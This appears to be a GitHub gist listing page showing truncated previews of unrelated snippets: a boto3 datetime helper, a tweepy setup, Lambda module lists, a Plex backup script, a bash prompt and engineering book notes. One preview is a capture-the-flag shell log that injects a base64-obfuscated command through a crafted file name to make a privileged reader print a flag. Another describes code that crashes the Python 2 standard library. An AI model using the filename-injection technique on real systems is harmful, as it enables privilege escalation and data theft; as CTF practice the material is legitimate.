smx-smx

XZ Backdoor symbol deobfuscation. Updated as i make progress

jeffbrl

# Adapted from https://stackoverflow.com/questions/35869985/datetime-datetime-is-not-json-serializable

import datetime
import json

import boto3

def datetime_handler(x):
    if isinstance(x, datetime.datetime):
        return x.isoformat()

rondy

FWIW: I (@rondy) am not the creator of the content shared here, which is an excerpt from Edmond Lau's book. I simply copied and pasted it from another location and saved it as a personal note, before it gained popularity on news.ycombinator.com. Unfortunately, I cannot recall the exact origin of the original source, nor was I able to find the author's name, so I am can't provide the appropriate credits.

---

Effective Engineer - Notes

• By Edmond Lau
• Highly Recommended 👍
• http://www.theeffectiveengineer.com/

What's an Effective Engineer?

timothyclemansinsea

import tweepy
import os
import json
def get_api(cfg):
  auth = tweepy.OAuthHandler(cfg['consumer_key'], cfg['consumer_secret'])
  auth.set_access_token(cfg['access_token'], cfg['access_token_secret'])
  return tweepy.API(auth)

def main():
  # Fill in the values noted in previous step here

gene1wood

This gist contains lists of modules available in

• Python 3.10
• Python 3.9
• Python 3.8
• Python 3.7
• Python 3.6
• Python 2.7

in AWS Lambda.

ssmereka

#!/bin/bash

# Backup a Plex database.
# Author Scott Smereka
# Version 1.0

# Script Tested on:
# Ubuntu 12.04 on 2/2/2014	[ OK ] 

# Plex Database Location.  The trailing slash is 

pascalpoitras

Mouse

---

enable

---

rspeer

"""
This file contains code that, when run on Python 2.7.5 or earlier, creates
a string that should not exist: u'\Udeadbeef'. That's a single "character"
that's illegal in Python because it's outside the valid Unicode range.

It then uses it to crash various things in the Python standard library and
corrupt a database.

On Python 3... well, this file is full of syntax errors on Python 3. But
if you were to change the print statements and byte literals and stuff:

gist:5431335

team417@securereader:/tmp/monkey$ echo '/home/securereader/secure_reader /tmp/monkey/flag' | base64
team417@securereader:/tmp/monkey$ touch ';exec $(echo L2hvbWUvc2VjdXJlcmVhZGVyL3NlY3VyZV9yZWFkZXIgL3RtcC9tb25rZXkvZmxhZwo=|base64 -d)'
team417@securereader:/tmp/monkey$ chmod -r ';exec $(echo L2hvbWUvc2VjdXJlcmVhZGVyL3NlY3VyZV9yZWFkZXIgL3RtcC9tb25rZXkvZmxhZwo=|base64 -d)'
team417@securereader:/tmp/monkey$ /home/securereader/reader ';exec $(echo L2hvbWUvc2VjdXJlcmVhZGVyL3NlY3VyZV9yZWFkZXIgL3RtcC9tb25rZXkvZmxhZwo=|base64 -d)'
This may only be called by /home/securereader/reader
that_was_totally_a_good_idea
team417@securereader:/tmp/monkey$

craSH

if [ "$PS1" ]; then
        if [ "$BASH" ]; then
                shortname=${HOSTNAME%%.*}
                shortname=${shortname//[aeiou]/}
                hostname_crc=$(echo $HOSTNAME | tr 'A-Z' 'a-z' | cksum)
                hostname_crc=${hostname_crc%% *}
                hostcolor_a=$(( (0x${hostname_crc} + 1) % 2 ))
                hostcolor_b=$(( 0x${hostname_crc} % 8 + 30 ))
                PS1="\[\e[33;1m\]\u@\[\e[${hostcolor_a};${hostcolor_b}m\]${shortname}:\[\e[0m\]\w"'\$ '
                PS2='\[\e[31;1m\]>\[\e[0m\]'